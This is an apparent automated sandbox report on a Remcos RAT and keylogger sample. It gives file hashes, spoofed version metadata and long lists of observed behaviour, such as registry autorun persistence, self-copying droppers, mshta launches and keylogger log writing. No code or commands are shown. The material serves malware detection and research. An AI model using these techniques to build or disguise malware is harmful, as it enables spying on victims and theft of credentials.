analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

40eb08895b4a3d0d9692558e22e078fd647d37f0ad881f5bf22ac5d93c79c4ef

Full analysis: https://app.any.run/tasks/46b23148-9bf8-45be-a1a4-c703c8a94d25
Verdict: Malicious activity
Threats:

A keylogger is a type of spyware that infects a system and has the ability to record every keystroke made on the device. This lets attackers collect personal information of victims, which may include their online banking credentials, as well as personal conversations. The most widespread vector of attack leading to a keylogger infection begins with a phishing email or link. Keylogging is also often present in remote access trojans as part of an extended set of malicious tools.

Analysis date: January 23, 2019, 09:31:28
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
rat
remcos
keylogger
Indicators:
MIME: application/x-dosexec
File info: PE32 executable (GUI) Intel 80386, for MS Windows
MD5:

05DFABA65C52033170BA744F16145053

SHA1:

ED493F6FC3589C2BD448845830BD4660671C0B2F

SHA256:

40EB08895B4A3D0D9692558E22E078FD647D37F0AD881F5BF22AC5D93C79C4EF

SSDEEP:

12288:6qgrFvmp3ueQ/xMS65uRIsuJD8IcuyCcTlmdBrco:NgYtueQ5MqRtIcM6

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Changes the autorun value in the registry

      • mshta.exe (PID: 3280)
      • mshta.exe (PID: 2648)
      • mshta.exe (PID: 4024)
      • mshta.exe (PID: 3672)
      • mshta.exe (PID: 2124)
      • mshta.exe (PID: 2160)
      • mshta.exe (PID: 3064)
      • mshta.exe (PID: 3612)
      • mshta.exe (PID: 2212)
      • mshta.exe (PID: 2912)
      • mshta.exe (PID: 3552)
      • mshta.exe (PID: 1244)
      • mshta.exe (PID: 2924)
      • mshta.exe (PID: 2884)
      • mshta.exe (PID: 3748)
      • mshta.exe (PID: 3124)
      • mshta.exe (PID: 1472)
      • mshta.exe (PID: 952)
      • mshta.exe (PID: 3940)
      • mshta.exe (PID: 3724)
      • mshta.exe (PID: 3872)
      • mshta.exe (PID: 2160)
      • mshta.exe (PID: 2880)
      • mshta.exe (PID: 1964)
      • mshta.exe (PID: 3032)
      • mshta.exe (PID: 1424)
      • mshta.exe (PID: 3736)
      • mshta.exe (PID: 4012)
      • mshta.exe (PID: 996)
      • mshta.exe (PID: 1560)
      • mshta.exe (PID: 2352)
      • mshta.exe (PID: 3288)
      • mshta.exe (PID: 2224)
      • mshta.exe (PID: 3456)
      • mshta.exe (PID: 2572)
      • mshta.exe (PID: 2772)
      • mshta.exe (PID: 2492)
      • mshta.exe (PID: 3060)
      • mshta.exe (PID: 1732)
      • mshta.exe (PID: 2324)
      • mshta.exe (PID: 3152)
      • mshta.exe (PID: 3856)
      • mshta.exe (PID: 3716)
      • mshta.exe (PID: 2480)
      • mshta.exe (PID: 3600)
      • mshta.exe (PID: 1356)
      • mshta.exe (PID: 2492)
      • mshta.exe (PID: 2636)
      • mshta.exe (PID: 968)
      • mshta.exe (PID: 2516)
      • mshta.exe (PID: 2612)
      • mshta.exe (PID: 2496)
      • mshta.exe (PID: 2996)
    • Application was dropped or rewritten from another process

      • avancementernesindskudsstni.exe (PID: 2240)
      • imgburn.exe (PID: 3120)
      • WEALTH SERVER.exe (PID: 2592)
      • avancementernesindskudsstni.exe (PID: 3688)
      • WEALTH SERVER.exe (PID: 4024)
      • imgburn.exe (PID: 3708)
      • avancementernesindskudsstni.exe (PID: 2280)
      • WEALTH SERVER.exe (PID: 2532)
      • imgburn.exe (PID: 2192)
      • imgburn.exe (PID: 2832)
      • WEALTH SERVER.exe (PID: 3188)
      • avancementernesindskudsstni.exe (PID: 2816)
      • avancementernesindskudsstni.exe (PID: 3388)
      • WEALTH SERVER.exe (PID: 2268)
      • imgburn.exe (PID: 3396)
      • imgburn.exe (PID: 3728)
      • avancementernesindskudsstni.exe (PID: 3772)
      • WEALTH SERVER.exe (PID: 540)
      • avancementernesindskudsstni.exe (PID: 2116)
      • WEALTH SERVER.exe (PID: 2360)
      • imgburn.exe (PID: 2156)
      • avancementernesindskudsstni.exe (PID: 2700)
      • WEALTH SERVER.exe (PID: 3224)
      • imgburn.exe (PID: 3116)
      • imgburn.exe (PID: 2840)
      • avancementernesindskudsstni.exe (PID: 3384)
      • WEALTH SERVER.exe (PID: 3744)
      • imgburn.exe (PID: 4052)
      • WEALTH SERVER.exe (PID: 2344)
      • avancementernesindskudsstni.exe (PID: 3992)
      • avancementernesindskudsstni.exe (PID: 2588)
      • WEALTH SERVER.exe (PID: 3044)
      • imgburn.exe (PID: 2788)
      • avancementernesindskudsstni.exe (PID: 3324)
      • imgburn.exe (PID: 3472)
      • WEALTH SERVER.exe (PID: 3760)
      • WEALTH SERVER.exe (PID: 2288)
      • imgburn.exe (PID: 3312)
      • avancementernesindskudsstni.exe (PID: 2596)
      • avancementernesindskudsstni.exe (PID: 3972)
      • WEALTH SERVER.exe (PID: 3012)
      • imgburn.exe (PID: 2704)
      • avancementernesindskudsstni.exe (PID: 3492)
      • imgburn.exe (PID: 3444)
      • WEALTH SERVER.exe (PID: 1732)
      • avancementernesindskudsstni.exe (PID: 4048)
      • WEALTH SERVER.exe (PID: 2652)
      • imgburn.exe (PID: 3532)
      • avancementernesindskudsstni.exe (PID: 792)
      • WEALTH SERVER.exe (PID: 676)
      • imgburn.exe (PID: 3748)
      • avancementernesindskudsstni.exe (PID: 4028)
      • WEALTH SERVER.exe (PID: 2316)
      • avancementernesindskudsstni.exe (PID: 2088)
      • imgburn.exe (PID: 4088)
      • imgburn.exe (PID: 476)
      • WEALTH SERVER.exe (PID: 2676)
      • avancementernesindskudsstni.exe (PID: 1144)
      • imgburn.exe (PID: 2540)
      • WEALTH SERVER.exe (PID: 3028)
      • WEALTH SERVER.exe (PID: 2408)
      • avancementernesindskudsstni.exe (PID: 2320)
      • avancementernesindskudsstni.exe (PID: 388)
      • imgburn.exe (PID: 3628)
      • WEALTH SERVER.exe (PID: 3512)
      • imgburn.exe (PID: 2828)
      • imgburn.exe (PID: 3552)
      • avancementernesindskudsstni.exe (PID: 3076)
      • avancementernesindskudsstni.exe (PID: 3400)
      • WEALTH SERVER.exe (PID: 3064)
      • imgburn.exe (PID: 3428)
      • WEALTH SERVER.exe (PID: 1760)
      • avancementernesindskudsstni.exe (PID: 2212)
      • imgburn.exe (PID: 2404)
      • WEALTH SERVER.exe (PID: 4016)
      • avancementernesindskudsstni.exe (PID: 2348)
      • WEALTH SERVER.exe (PID: 2476)
      • imgburn.exe (PID: 2284)
      • avancementernesindskudsstni.exe (PID: 640)
      • WEALTH SERVER.exe (PID: 3204)
      • imgburn.exe (PID: 2752)
      • imgburn.exe (PID: 3036)
      • avancementernesindskudsstni.exe (PID: 2296)
      • WEALTH SERVER.exe (PID: 4044)
      • WEALTH SERVER.exe (PID: 3756)
      • avancementernesindskudsstni.exe (PID: 1860)
      • imgburn.exe (PID: 3872)
      • imgburn.exe (PID: 3156)
      • avancementernesindskudsstni.exe (PID: 864)
      • WEALTH SERVER.exe (PID: 1672)
      • WEALTH SERVER.exe (PID: 2632)
      • avancementernesindskudsstni.exe (PID: 2532)
      • imgburn.exe (PID: 3580)
      • avancementernesindskudsstni.exe (PID: 2276)
      • WEALTH SERVER.exe (PID: 3304)
      • imgburn.exe (PID: 3488)
      • avancementernesindskudsstni.exe (PID: 3048)
      • WEALTH SERVER.exe (PID: 1672)
      • imgburn.exe (PID: 2416)
      • WEALTH SERVER.exe (PID: 2972)
      • avancementernesindskudsstni.exe (PID: 4000)
      • WEALTH SERVER.exe (PID: 3960)
      • imgburn.exe (PID: 2104)
      • avancementernesindskudsstni.exe (PID: 1796)
      • imgburn.exe (PID: 1064)
      • avancementernesindskudsstni.exe (PID: 3900)
      • WEALTH SERVER.exe (PID: 2776)
      • imgburn.exe (PID: 2956)
      • avancementernesindskudsstni.exe (PID: 3888)
      • imgburn.exe (PID: 1528)
      • avancementernesindskudsstni.exe (PID: 3564)
      • WEALTH SERVER.exe (PID: 3000)
      • WEALTH SERVER.exe (PID: 3260)
      • imgburn.exe (PID: 2224)
      • avancementernesindskudsstni.exe (PID: 3332)
      • WEALTH SERVER.exe (PID: 2976)
      • WEALTH SERVER.exe (PID: 3544)
      • imgburn.exe (PID: 2124)
      • avancementernesindskudsstni.exe (PID: 2432)
      • imgburn.exe (PID: 3732)
      • imgburn.exe (PID: 296)
      • WEALTH SERVER.exe (PID: 1968)
      • avancementernesindskudsstni.exe (PID: 2916)
      • avancementernesindskudsstni.exe (PID: 2872)
      • WEALTH SERVER.exe (PID: 3976)
      • imgburn.exe (PID: 3144)
      • avancementernesindskudsstni.exe (PID: 1384)
      • WEALTH SERVER.exe (PID: 272)
      • avancementernesindskudsstni.exe (PID: 3008)
      • imgburn.exe (PID: 4084)
      • WEALTH SERVER.exe (PID: 2424)
      • imgburn.exe (PID: 624)
      • avancementernesindskudsstni.exe (PID: 2264)
      • WEALTH SERVER.exe (PID: 3420)
      • imgburn.exe (PID: 956)
      • avancementernesindskudsstni.exe (PID: 2696)
      • WEALTH SERVER.exe (PID: 3348)
      • imgburn.exe (PID: 3812)
      • avancementernesindskudsstni.exe (PID: 3232)
      • WEALTH SERVER.exe (PID: 3820)
      • imgburn.exe (PID: 2300)
      • imgburn.exe (PID: 3648)
      • avancementernesindskudsstni.exe (PID: 3880)
      • WEALTH SERVER.exe (PID: 2512)
      • WEALTH SERVER.exe (PID: 3044)
      • avancementernesindskudsstni.exe (PID: 2976)
      • imgburn.exe (PID: 3656)
      • avancementernesindskudsstni.exe (PID: 1348)
      • WEALTH SERVER.exe (PID: 4004)
      • imgburn.exe (PID: 3252)
      • WEALTH SERVER.exe (PID: 2892)
      • avancementernesindskudsstni.exe (PID: 2252)
      • imgburn.exe (PID: 4060)
      • WEALTH SERVER.exe (PID: 3892)
      • avancementernesindskudsstni.exe (PID: 3292)
      • imgburn.exe (PID: 3284)
      • avancementernesindskudsstni.exe (PID: 2440)
      • WEALTH SERVER.exe (PID: 2728)
      • imgburn.exe (PID: 2400)
    • REMCOS RAT was detected

      • WEALTH SERVER.exe (PID: 2592)
    • Detected logs from REMCOS RAT

      • WEALTH SERVER.exe (PID: 2592)
  • SUSPICIOUS

    • Starts MSHTA.EXE for opening HTA or HTMLS files

      • 40eb08895b4a3d0d9692558e22e078fd647d37f0ad881f5bf22ac5d93c79c4ef.exe (PID: 3164)
      • imgburn.exe (PID: 3120)
      • imgburn.exe (PID: 3708)
      • imgburn.exe (PID: 2192)
      • imgburn.exe (PID: 2832)
      • imgburn.exe (PID: 3396)
      • imgburn.exe (PID: 3728)
      • imgburn.exe (PID: 2156)
      • imgburn.exe (PID: 2840)
      • imgburn.exe (PID: 3116)
      • imgburn.exe (PID: 4052)
      • imgburn.exe (PID: 2788)
      • imgburn.exe (PID: 3472)
      • imgburn.exe (PID: 3312)
      • imgburn.exe (PID: 3444)
      • imgburn.exe (PID: 2704)
      • imgburn.exe (PID: 3532)
      • imgburn.exe (PID: 3748)
      • imgburn.exe (PID: 4088)
      • imgburn.exe (PID: 476)
      • imgburn.exe (PID: 2540)
      • imgburn.exe (PID: 3628)
      • imgburn.exe (PID: 2828)
      • imgburn.exe (PID: 3552)
      • imgburn.exe (PID: 3428)
      • imgburn.exe (PID: 2404)
      • imgburn.exe (PID: 2284)
      • imgburn.exe (PID: 2752)
      • imgburn.exe (PID: 3036)
      • imgburn.exe (PID: 3872)
      • imgburn.exe (PID: 3156)
      • imgburn.exe (PID: 3580)
      • imgburn.exe (PID: 3488)
      • imgburn.exe (PID: 2416)
      • imgburn.exe (PID: 2104)
      • imgburn.exe (PID: 1064)
      • imgburn.exe (PID: 2956)
      • imgburn.exe (PID: 1528)
      • imgburn.exe (PID: 2224)
      • imgburn.exe (PID: 2124)
      • imgburn.exe (PID: 3732)
      • imgburn.exe (PID: 296)
      • imgburn.exe (PID: 3144)
      • imgburn.exe (PID: 624)
      • imgburn.exe (PID: 4084)
      • imgburn.exe (PID: 956)
      • imgburn.exe (PID: 3812)
      • imgburn.exe (PID: 2300)
      • imgburn.exe (PID: 3648)
      • imgburn.exe (PID: 3656)
      • imgburn.exe (PID: 3252)
      • imgburn.exe (PID: 4060)
      • imgburn.exe (PID: 3284)
    • Executable content was dropped or overwritten

      • 40eb08895b4a3d0d9692558e22e078fd647d37f0ad881f5bf22ac5d93c79c4ef.exe (PID: 3164)
      • avancementernesindskudsstni.exe (PID: 2240)
      • avancementernesindskudsstni.exe (PID: 3688)
      • avancementernesindskudsstni.exe (PID: 2280)
      • avancementernesindskudsstni.exe (PID: 2816)
      • avancementernesindskudsstni.exe (PID: 3388)
      • avancementernesindskudsstni.exe (PID: 3772)
      • avancementernesindskudsstni.exe (PID: 2116)
      • avancementernesindskudsstni.exe (PID: 2700)
      • avancementernesindskudsstni.exe (PID: 3384)
      • avancementernesindskudsstni.exe (PID: 3992)
      • avancementernesindskudsstni.exe (PID: 2588)
      • avancementernesindskudsstni.exe (PID: 3324)
      • avancementernesindskudsstni.exe (PID: 3972)
      • avancementernesindskudsstni.exe (PID: 2596)
      • avancementernesindskudsstni.exe (PID: 3492)
      • avancementernesindskudsstni.exe (PID: 4048)
      • avancementernesindskudsstni.exe (PID: 4028)
      • avancementernesindskudsstni.exe (PID: 792)
      • avancementernesindskudsstni.exe (PID: 2088)
      • avancementernesindskudsstni.exe (PID: 1144)
      • avancementernesindskudsstni.exe (PID: 2320)
      • avancementernesindskudsstni.exe (PID: 388)
      • avancementernesindskudsstni.exe (PID: 3076)
      • avancementernesindskudsstni.exe (PID: 3400)
      • avancementernesindskudsstni.exe (PID: 2212)
      • avancementernesindskudsstni.exe (PID: 2348)
      • avancementernesindskudsstni.exe (PID: 640)
      • avancementernesindskudsstni.exe (PID: 2296)
      • avancementernesindskudsstni.exe (PID: 1860)
      • avancementernesindskudsstni.exe (PID: 864)
      • avancementernesindskudsstni.exe (PID: 2532)
      • avancementernesindskudsstni.exe (PID: 2276)
      • avancementernesindskudsstni.exe (PID: 3048)
      • avancementernesindskudsstni.exe (PID: 4000)
      • avancementernesindskudsstni.exe (PID: 1796)
      • avancementernesindskudsstni.exe (PID: 3900)
      • avancementernesindskudsstni.exe (PID: 3888)
      • avancementernesindskudsstni.exe (PID: 3564)
      • avancementernesindskudsstni.exe (PID: 3332)
      • avancementernesindskudsstni.exe (PID: 2432)
      • avancementernesindskudsstni.exe (PID: 2872)
      • avancementernesindskudsstni.exe (PID: 2916)
      • avancementernesindskudsstni.exe (PID: 1384)
      • avancementernesindskudsstni.exe (PID: 3008)
      • avancementernesindskudsstni.exe (PID: 2264)
      • avancementernesindskudsstni.exe (PID: 2696)
      • avancementernesindskudsstni.exe (PID: 3232)
      • avancementernesindskudsstni.exe (PID: 3880)
      • avancementernesindskudsstni.exe (PID: 2976)
      • avancementernesindskudsstni.exe (PID: 1348)
      • avancementernesindskudsstni.exe (PID: 2252)
      • avancementernesindskudsstni.exe (PID: 3292)
      • avancementernesindskudsstni.exe (PID: 2440)
    • Writes files like Keylogger logs

      • 40eb08895b4a3d0d9692558e22e078fd647d37f0ad881f5bf22ac5d93c79c4ef.exe (PID: 3164)
      • WEALTH SERVER.exe (PID: 2592)
    • Starts itself from another location

      • avancementernesindskudsstni.exe (PID: 2240)
      • imgburn.exe (PID: 3120)
      • avancementernesindskudsstni.exe (PID: 3688)
      • imgburn.exe (PID: 3708)
      • avancementernesindskudsstni.exe (PID: 2280)
      • imgburn.exe (PID: 2192)
      • avancementernesindskudsstni.exe (PID: 2816)
      • imgburn.exe (PID: 2832)
      • avancementernesindskudsstni.exe (PID: 3388)
      • imgburn.exe (PID: 3396)
      • avancementernesindskudsstni.exe (PID: 3772)
      • imgburn.exe (PID: 3728)
      • avancementernesindskudsstni.exe (PID: 2116)
      • imgburn.exe (PID: 2156)
      • avancementernesindskudsstni.exe (PID: 2700)
      • imgburn.exe (PID: 2840)
      • avancementernesindskudsstni.exe (PID: 3384)
      • imgburn.exe (PID: 3116)
      • avancementernesindskudsstni.exe (PID: 3992)
      • imgburn.exe (PID: 4052)
      • imgburn.exe (PID: 2788)
      • avancementernesindskudsstni.exe (PID: 2588)
      • avancementernesindskudsstni.exe (PID: 3324)
      • imgburn.exe (PID: 3472)
      • avancementernesindskudsstni.exe (PID: 3972)
      • imgburn.exe (PID: 3312)
      • avancementernesindskudsstni.exe (PID: 2596)
      • imgburn.exe (PID: 2704)
      • imgburn.exe (PID: 3444)
      • avancementernesindskudsstni.exe (PID: 3492)
      • avancementernesindskudsstni.exe (PID: 4048)
      • avancementernesindskudsstni.exe (PID: 4028)
      • imgburn.exe (PID: 3532)
      • imgburn.exe (PID: 3748)
      • imgburn.exe (PID: 4088)
      • avancementernesindskudsstni.exe (PID: 792)
      • avancementernesindskudsstni.exe (PID: 2088)
      • imgburn.exe (PID: 476)
      • avancementernesindskudsstni.exe (PID: 1144)
      • imgburn.exe (PID: 2540)
      • avancementernesindskudsstni.exe (PID: 2320)
      • imgburn.exe (PID: 3628)
      • avancementernesindskudsstni.exe (PID: 388)
      • imgburn.exe (PID: 2828)
      • avancementernesindskudsstni.exe (PID: 3076)
      • imgburn.exe (PID: 3552)
      • avancementernesindskudsstni.exe (PID: 3400)
      • imgburn.exe (PID: 3428)
      • avancementernesindskudsstni.exe (PID: 2212)
      • avancementernesindskudsstni.exe (PID: 2348)
      • imgburn.exe (PID: 2404)
      • imgburn.exe (PID: 2284)
      • avancementernesindskudsstni.exe (PID: 640)
      • imgburn.exe (PID: 2752)
      • avancementernesindskudsstni.exe (PID: 2296)
      • avancementernesindskudsstni.exe (PID: 1860)
      • imgburn.exe (PID: 3036)
      • avancementernesindskudsstni.exe (PID: 864)
      • imgburn.exe (PID: 3872)
      • imgburn.exe (PID: 3156)
      • avancementernesindskudsstni.exe (PID: 2532)
      • imgburn.exe (PID: 3580)
      • avancementernesindskudsstni.exe (PID: 2276)
      • avancementernesindskudsstni.exe (PID: 3048)
      • imgburn.exe (PID: 3488)
      • avancementernesindskudsstni.exe (PID: 4000)
      • imgburn.exe (PID: 2416)
      • avancementernesindskudsstni.exe (PID: 1796)
      • imgburn.exe (PID: 2104)
      • imgburn.exe (PID: 1064)
      • avancementernesindskudsstni.exe (PID: 3900)
      • avancementernesindskudsstni.exe (PID: 3888)
      • imgburn.exe (PID: 2956)
      • imgburn.exe (PID: 1528)
      • avancementernesindskudsstni.exe (PID: 3564)
      • imgburn.exe (PID: 2224)
      • avancementernesindskudsstni.exe (PID: 3332)
      • imgburn.exe (PID: 2124)
      • avancementernesindskudsstni.exe (PID: 2432)
      • imgburn.exe (PID: 3732)
      • avancementernesindskudsstni.exe (PID: 2872)
      • imgburn.exe (PID: 296)
      • avancementernesindskudsstni.exe (PID: 2916)
      • avancementernesindskudsstni.exe (PID: 1384)
      • imgburn.exe (PID: 3144)
      • avancementernesindskudsstni.exe (PID: 3008)
      • imgburn.exe (PID: 624)
      • avancementernesindskudsstni.exe (PID: 2264)
      • imgburn.exe (PID: 4084)
      • imgburn.exe (PID: 956)
      • avancementernesindskudsstni.exe (PID: 2696)
      • imgburn.exe (PID: 3812)
      • avancementernesindskudsstni.exe (PID: 3232)
      • avancementernesindskudsstni.exe (PID: 3880)
      • imgburn.exe (PID: 2300)
      • imgburn.exe (PID: 3648)
      • avancementernesindskudsstni.exe (PID: 2976)
      • imgburn.exe (PID: 3656)
      • imgburn.exe (PID: 3252)
      • avancementernesindskudsstni.exe (PID: 1348)
      • avancementernesindskudsstni.exe (PID: 2252)
      • imgburn.exe (PID: 4060)
      • avancementernesindskudsstni.exe (PID: 3292)
      • imgburn.exe (PID: 3284)
      • avancementernesindskudsstni.exe (PID: 2440)
    • Connects to unusual port

      • WEALTH SERVER.exe (PID: 2592)
    • Creates files in the user directory

      • avancementernesindskudsstni.exe (PID: 2240)
      • avancementernesindskudsstni.exe (PID: 3688)
      • WEALTH SERVER.exe (PID: 2592)
      • avancementernesindskudsstni.exe (PID: 2280)
      • avancementernesindskudsstni.exe (PID: 2816)
      • avancementernesindskudsstni.exe (PID: 3388)
      • avancementernesindskudsstni.exe (PID: 3772)
      • avancementernesindskudsstni.exe (PID: 2116)
      • avancementernesindskudsstni.exe (PID: 3384)
      • avancementernesindskudsstni.exe (PID: 2700)
      • avancementernesindskudsstni.exe (PID: 3992)
      • avancementernesindskudsstni.exe (PID: 2588)
      • avancementernesindskudsstni.exe (PID: 3324)
      • avancementernesindskudsstni.exe (PID: 3972)
      • avancementernesindskudsstni.exe (PID: 2596)
      • avancementernesindskudsstni.exe (PID: 3492)
      • avancementernesindskudsstni.exe (PID: 4048)
      • avancementernesindskudsstni.exe (PID: 4028)
      • avancementernesindskudsstni.exe (PID: 792)
      • avancementernesindskudsstni.exe (PID: 2088)
      • avancementernesindskudsstni.exe (PID: 1144)
      • avancementernesindskudsstni.exe (PID: 2320)
      • avancementernesindskudsstni.exe (PID: 388)
      • avancementernesindskudsstni.exe (PID: 3076)
      • avancementernesindskudsstni.exe (PID: 3400)
      • avancementernesindskudsstni.exe (PID: 2212)
      • avancementernesindskudsstni.exe (PID: 2348)
      • avancementernesindskudsstni.exe (PID: 640)
      • avancementernesindskudsstni.exe (PID: 2296)
      • avancementernesindskudsstni.exe (PID: 1860)
      • avancementernesindskudsstni.exe (PID: 864)
      • avancementernesindskudsstni.exe (PID: 2532)
      • avancementernesindskudsstni.exe (PID: 2276)
      • avancementernesindskudsstni.exe (PID: 3048)
      • avancementernesindskudsstni.exe (PID: 4000)
      • avancementernesindskudsstni.exe (PID: 1796)
      • avancementernesindskudsstni.exe (PID: 3900)
      • avancementernesindskudsstni.exe (PID: 3888)
      • avancementernesindskudsstni.exe (PID: 3564)
      • avancementernesindskudsstni.exe (PID: 3332)
      • avancementernesindskudsstni.exe (PID: 2432)
      • avancementernesindskudsstni.exe (PID: 2872)
      • avancementernesindskudsstni.exe (PID: 2916)
      • avancementernesindskudsstni.exe (PID: 1384)
      • avancementernesindskudsstni.exe (PID: 3008)
      • avancementernesindskudsstni.exe (PID: 2264)
      • avancementernesindskudsstni.exe (PID: 2696)
      • avancementernesindskudsstni.exe (PID: 3232)
      • avancementernesindskudsstni.exe (PID: 3880)
      • avancementernesindskudsstni.exe (PID: 2976)
      • avancementernesindskudsstni.exe (PID: 1348)
      • avancementernesindskudsstni.exe (PID: 2252)
      • avancementernesindskudsstni.exe (PID: 3292)
      • avancementernesindskudsstni.exe (PID: 2440)
  • INFO

    • Reads internet explorer settings

      • mshta.exe (PID: 3280)
      • mshta.exe (PID: 2648)
      • mshta.exe (PID: 4024)
      • mshta.exe (PID: 3672)
      • mshta.exe (PID: 2124)
      • mshta.exe (PID: 2160)
      • mshta.exe (PID: 3064)
      • mshta.exe (PID: 3612)
      • mshta.exe (PID: 2212)
      • mshta.exe (PID: 3552)
      • mshta.exe (PID: 2912)
      • mshta.exe (PID: 1244)
      • mshta.exe (PID: 2924)
      • mshta.exe (PID: 2884)
      • mshta.exe (PID: 3124)
      • mshta.exe (PID: 3748)
      • mshta.exe (PID: 3940)
      • mshta.exe (PID: 1472)
      • mshta.exe (PID: 952)
      • mshta.exe (PID: 3724)
      • mshta.exe (PID: 3872)
      • mshta.exe (PID: 2160)
      • mshta.exe (PID: 2880)
      • mshta.exe (PID: 1964)
      • mshta.exe (PID: 3032)
      • mshta.exe (PID: 1424)
      • mshta.exe (PID: 3736)
      • mshta.exe (PID: 4012)
      • mshta.exe (PID: 996)
      • mshta.exe (PID: 1560)
      • mshta.exe (PID: 2352)
      • mshta.exe (PID: 3288)
      • mshta.exe (PID: 2224)
      • mshta.exe (PID: 3456)
      • mshta.exe (PID: 2572)
      • mshta.exe (PID: 2772)
      • mshta.exe (PID: 2492)
      • mshta.exe (PID: 3060)
      • mshta.exe (PID: 1732)
      • mshta.exe (PID: 2324)
      • mshta.exe (PID: 3152)
      • mshta.exe (PID: 3856)
      • mshta.exe (PID: 3716)
      • mshta.exe (PID: 2480)
      • mshta.exe (PID: 3600)
      • mshta.exe (PID: 1356)
      • mshta.exe (PID: 2492)
      • mshta.exe (PID: 2636)
      • mshta.exe (PID: 968)
      • mshta.exe (PID: 2516)
      • mshta.exe (PID: 2612)
      • mshta.exe (PID: 2496)
      • mshta.exe (PID: 2996)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win32 Executable Microsoft Visual Basic 6 (90.6)
.exe | Win32 Executable (generic) (4.9)
.exe | Generic Win/DOS Executable (2.2)
.exe | DOS Executable Generic (2.2)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2019:01:21 22:10:44+01:00
PEType: PE32
LinkerVersion: 6
CodeSize: 598016
InitializedDataSize: 73728
UninitializedDataSize: -
EntryPoint: 0x127c
OSVersion: 4
ImageVersion: 7.6
SubsystemVersion: 4
Subsystem: Windows GUI
FileVersionNumber: 7.6.0.7
ProductVersionNumber: 7.6.0.7
FileFlagsMask: 0x0000
FileFlags: (none)
FileOS: Win32
ObjectFileType: Executable application
FileSubtype: -
LanguageCode: Chinese (Simplified)
CharacterSet: Unicode
Comments: SAMSUng Electronics Co., Ltd.
CompanyName: PC TOOLS
FileDescription: ROCkStAr
LegalCopyright: NORman SAfEground AS
LegalTrademarks: ASUS
ProductName: EPSoN
FileVersion: 7.06.0007
ProductVersion: 7.06.0007
InternalName: Psychochemistlivedeoverelabor
OriginalFileName: Psychochemistlivedeoverelabor.exe

Summary

Architecture: IMAGE_FILE_MACHINE_I386
Subsystem: IMAGE_SUBSYSTEM_WINDOWS_GUI
Compilation Date: 21-Jan-2019 21:10:44
Detected languages:
  • Chinese - PRC
  • Dutch - Belgium
Comments: SAMSUng Electronics Co., Ltd.
CompanyName: PC TOOLS
FileDescription: ROCkStAr
LegalCopyright: NORman SAfEground AS
LegalTrademarks: ASUS
ProductName: EPSoN
FileVersion: 7.06.0007
ProductVersion: 7.06.0007
InternalName: Psychochemistlivedeoverelabor
OriginalFilename: Psychochemistlivedeoverelabor.exe

DOS Header

Magic number: MZ
Bytes on last page of file: 0x0090
Pages in file: 0x0003
Relocations: 0x0000
Size of header: 0x0004
Min extra paragraphs: 0x0000
Max extra paragraphs: 0xFFFF
Initial SS value: 0x0000
Initial SP value: 0x00B8
Checksum: 0x0000
Initial IP value: 0x0000
Initial CS value: 0x0000
Overlay number: 0x0000
OEM identifier: 0x0000
OEM information: 0x0000
Address of NE header: 0x000000B8

PE Headers

Signature: PE
Machine: IMAGE_FILE_MACHINE_I386
Number of sections: 3
Time date stamp: 21-Jan-2019 21:10:44
Pointer to Symbol Table: 0x00000000
Number of symbols: 0
Size of Optional Header: 0x00E0
Characteristics:
  • IMAGE_FILE_32BIT_MACHINE
  • IMAGE_FILE_EXECUTABLE_IMAGE
  • IMAGE_FILE_LINE_NUMS_STRIPPED
  • IMAGE_FILE_LOCAL_SYMS_STRIPPED
  • IMAGE_FILE_RELOCS_STRIPPED

Sections

Name
Virtual Address
Virtual Size
Raw Size
Charateristics
Entropy
.text
0x00001000
0x000912BC
0x00092000
IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
6.59814
.data
0x00093000
0x00000B80
0x00001000
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
0
.rsrc
0x00094000
0x00010E18
0x00011000
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
4.12115

Resources

Title
Entropy
Size
Codepage
Language
Type
1
3.42919
904
Unicode (UTF 16LE)
Chinese - PRC
RT_VERSION
7
2.64089
178
Unicode (UTF 16LE)
Dutch - Belgium
RT_STRING
8
1.4568
62
Unicode (UTF 16LE)
Dutch - Belgium
RT_STRING

Imports

MSVBVM60.DLL
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
243
Monitored processes
213
Malicious processes
109
Suspicious processes
13

Behavior graph

Click at the process to see the details
drop and start drop and start start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start drop and start 40eb08895b4a3d0d9692558e22e078fd647d37f0ad881f5bf22ac5d93c79c4ef.exe mshta.exe avancementernesindskudsstni.exe #REMCOS wealth server.exe imgburn.exe no specs mshta.exe avancementernesindskudsstni.exe wealth server.exe no specs imgburn.exe no specs mshta.exe avancementernesindskudsstni.exe wealth server.exe no specs imgburn.exe no specs mshta.exe avancementernesindskudsstni.exe wealth server.exe no specs imgburn.exe no specs mshta.exe avancementernesindskudsstni.exe wealth server.exe no specs imgburn.exe no specs mshta.exe avancementernesindskudsstni.exe wealth server.exe no specs imgburn.exe no specs mshta.exe avancementernesindskudsstni.exe wealth server.exe no specs imgburn.exe no specs mshta.exe avancementernesindskudsstni.exe wealth server.exe no specs imgburn.exe no specs mshta.exe avancementernesindskudsstni.exe wealth server.exe no specs imgburn.exe no specs mshta.exe avancementernesindskudsstni.exe wealth server.exe no specs imgburn.exe no specs mshta.exe avancementernesindskudsstni.exe wealth server.exe no specs imgburn.exe no specs mshta.exe avancementernesindskudsstni.exe wealth server.exe no specs imgburn.exe no specs mshta.exe avancementernesindskudsstni.exe wealth server.exe no specs imgburn.exe no specs mshta.exe 